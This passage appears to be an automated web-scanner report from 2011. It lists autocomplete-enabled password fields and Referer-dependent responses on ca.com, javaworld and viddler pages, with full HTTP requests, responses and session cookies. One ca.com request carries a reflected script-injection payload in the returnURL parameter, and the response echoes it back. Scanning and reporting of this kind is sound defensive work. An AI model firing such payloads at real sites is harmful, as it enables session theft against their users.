Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&amp;GUID=&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=rs-prod-communities-wa&amp;TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.5. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; SMTRYNO=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:27:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:11 GMT
Content-Length: 36262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&amp;GUID=0&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&amp;TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.6. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss HTTP/1.1
Host: www.ca.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=22cc2d847a5ef580ca31315351916776:lv=1315351916776:ss=1315351916776

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:35:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:35:48 GMT
Content-Length: 36023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.7. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; SMTRYNO=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:26:55 GMT
Content-Length: 36448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<body onload="getFocus();">

<form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&amp;REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&amp;GUID=0&amp;SMAUTHREASON=0&amp;METHOD=GET&amp;SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&amp;TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm">
<div>
...[SNIP]...
<div class="formitemfield">
<input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" />
<div class="formtip2 blue small">
...[SNIP]...

8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<div class="welcomebar">
       
               <form action="/forums/login.jspa" method="post" name="loginform">
               Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" />
               Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" />
               <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />
...[SNIP]...

8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

9. Referer-dependent response  previous  next
There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Request 1

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script language="javascript">
var outerref = new String("http://www.google.com/search?sourceid=chrome&amp;ie=UTF-8&amp;q=acegisecurity");
var nwchannel = 'jw';
var refresh = 0;

var jq_rxid = '115812';
</script>
<base target = "_top">

<script type="text/javascript" src="/includes/head-scripts.js"></script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script type="text/javascript">
NW = window.NW || {};

NW.PageInfo = NW.PageInfo || {};
NW.PageInfo = function() {
return{
cookie_domain: "javaworld.com",
rxprimarytopic: "enterprise",
       rxheadline: "Acegi Security in one hour",
channels: "jw",
request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
rxid: "115812",
nodeid: "",
       pgtype: "article",

// use this function to return meta info and add to NW.PageInfo object
setMetaInfo: function() {
$("meta").each(function (i) {
var n = $(this).attr("name");
var c = $(this).attr("content")
//alert('before - ' + n + ": " + c);
if(n && c) {
NW.PageInfo[n] = $(this).attr("content");
//document.write('in - ' + n + ": " + c + '<br />');
}
});
}
};
}();
NW.PageInfo.setMetaInfo();
</script>


<!-- HBX -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com";
var doctitle = hbxStrip(document.title);
var loc = new String(document.location.href);
loc = hbxStrip(loc);

hbx.acct="DM54120129AB;DM550210NGWB";
hbx.pn="PUT+PAGE+NAME+HERE";
hbx.mlc="CONTENT+CATEGORY";
hbx.pndef="title";
hbx.ctdef="full";
hbx.lvm="300";
hbx.lidt="txl";

hbx.fv="";//FORM VAL MIN
hbx.lt="auto"; //LINK TR
hbx.dlf="n";//Dl FILTER
hbx.dft="n";//Dl FILE NAMING
hbx.elf="n";//E
...[SNIP]...

Request 2

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:58 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67878


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script language="javascript">
var outerref = new String("(none)");
var nwchannel = 'jw';
var refresh = 0;

var jq_rxid = '115812';
</script>
<base target = "_top">

<script type="text/javascript" src="/includes/head-scripts.js"></script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script type="text/javascript">
NW = window.NW || {};

NW.PageInfo = NW.PageInfo || {};
NW.PageInfo = function() {
return{
cookie_domain: "javaworld.com",
rxprimarytopic: "enterprise",
       rxheadline: "Acegi Security in one hour",
channels: "jw",
request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
rxid: "115812",
nodeid: "",
       pgtype: "article",

// use this function to return meta info and add to NW.PageInfo object
setMetaInfo: function() {
$("meta").each(function (i) {
var n = $(this).attr("name");
var c = $(this).attr("content")
//alert('before - ' + n + ": " + c);
if(n && c) {
NW.PageInfo[n] = $(this).attr("content");
//document.write('in - ' + n + ": " + c + '<br />');
}
});
}
};
}();
NW.PageInfo.setMetaInfo();
</script>


<!-- HBX -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com";
var doctitle = hbxStrip(document.title);
var loc = new String(document.location.href);
loc = hbxStrip(loc);

hbx.acct="DM54120129AB;DM550210NGWB";
hbx.pn="PUT+PAGE+NAME+HERE";
hbx.mlc="CONTENT+CATEGORY";
hbx.pndef="title";
hbx.ctdef="full";
hbx.lvm="300";
hbx.lidt="txl";

hbx.fv="";//FORM VAL MIN
hbx.lt="auto"; //LINK TR
hbx.dlf="n";//Dl FILTER
hbx.dft="n";//Dl FILE NAMING
hbx.elf="n";//EXIT LINK FILTER

hbx.seg="-1";
hbx.ci="";
hbx.hc1="enterprise|";
hbx.hc
...[SNIP]...

9.2. http://www.viddler.com/embed/dca1712/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.viddler.com
Path:   /embed/dca1712/

Request 1

GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://blog.proofpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_a
Vary: Accept-Encoding
Content-Length: 3047

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>ep105 Cloud Computing and the Law</title>

<meta name="description" content="ep
...[SNIP]...
h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=http%3A%2F%2Fblog.proofpoint.com%2F&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>

</div></div></body>
</html>

Request 2

GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_p
Vary: Accept-Encoding
Content-Length: 3012

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>ep105 Cloud Computing and the Law</title>

<meta name="description" content="ep
...[SNIP]...
h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>

</div></div></body>
</html>

9.3. http://www.viddler.com/player/dca1712/0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.viddler.com
Path:   /player/dca1712/0

Request 1

GET /player/dca1712/0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a

Response 1

HTTP/1.1 302 Found
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:11 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0
Vary: Accept-Encoding
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&amp;key=dca1712&amp;offsetTime=0">here</a>.</p>
<hr>
<address>Apache/2.2.16 Server at www.viddler.com Port 80</address>
</body></html>

Request 2

GET /player/dca1712/0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a

Response 2

HTTP/1.1 302 Found
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
